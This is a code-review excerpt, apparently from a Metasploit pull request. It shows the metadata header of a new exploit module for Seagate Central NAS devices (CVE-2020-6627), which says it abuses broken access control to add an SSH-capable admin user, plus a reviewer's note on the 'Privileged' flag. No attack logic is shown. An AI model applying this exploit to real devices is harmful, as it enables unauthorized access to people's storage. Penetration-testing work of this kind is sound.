modules/exploits/linux/http/seagate_central_ssh_user_add.rb

```diff
@@ -0,0 +1,215 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'net/http'
+require 'net/ssh'
+require 'net/ssh/command_stream'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::SSH
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "Seagate Central Remote Code Execution Exploit",
+      'Description'    => %q{
+        This module exploits the broken access control vulnerability in Seagate Central External NAS Storage device.
+        Subject product suffers several critical vulnerabilities such as broken access control. It makes it possible to changes the device state
+        and register a new admin user witch is capable of ssh access.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Ege Balcı <egebalci@pm.me>' # author & msf module
+        ],
+      'References'     =>
+        [
+          ['URL', 'https://pentest.blog/advisory-seagate-central-storage-remote-code-execution/'],
+          ['CVE','2020-6627']
+        ],
+      'DefaultOptions'  =>
+        {
+          'SSL' => false,
+          'WfsDelay' => 5,
+        },
+      'Platform'       => ['unix'],
+      'Arch'           => [ARCH_CMD],
+      'Payload'        =>
+      {
+        'Compat' => {
+          'PayloadType'    => 'cmd_interact',
+          'ConnectionType' => 'find'
+        }
+      },
+      'Targets'        =>
+        [
+          ['Auto',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD
+            }
+          ],
+        ],
+      'Privileged'     => true,
```

Comment:
The `Privileged` module meta data key indicates that the returned session is privileged, ie, `root` or `SYSTEM`.

```suggestion
      'Privileged'     => false,
```